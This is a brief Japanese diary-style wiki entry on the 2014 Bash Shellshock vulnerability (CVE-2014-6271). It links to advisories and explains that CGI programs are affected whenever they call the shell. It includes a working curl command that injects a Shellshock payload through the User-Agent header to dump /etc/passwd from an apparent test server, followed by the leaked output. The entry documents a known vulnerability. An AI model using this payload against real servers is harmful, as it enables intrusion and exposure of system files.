====== 2014.09.25 Bash脆弱性 ======
[[https://support.clara.jp/news/20140925_bash_update.htm]]
[[http://www.walbrix.com/jp/blog/2014-09-bash-code-injection.html]]
[[https://access.redhat.com/security/cve/CVE-2014-6271]]
**※CGI本体をシェルスクリプトで書いていなくても、シェルを使って外部コマンドを呼び出しているだけで影響有り**
下記のスクリプトをCGIモードで動かしている場合、影響有りです。
===== 以下実行例 =====
curl -A "() { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd" http://fl8.jp/test.php
AAAAContent-type:text/plain
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
・
・
・
・
{{tag>日記 Security}}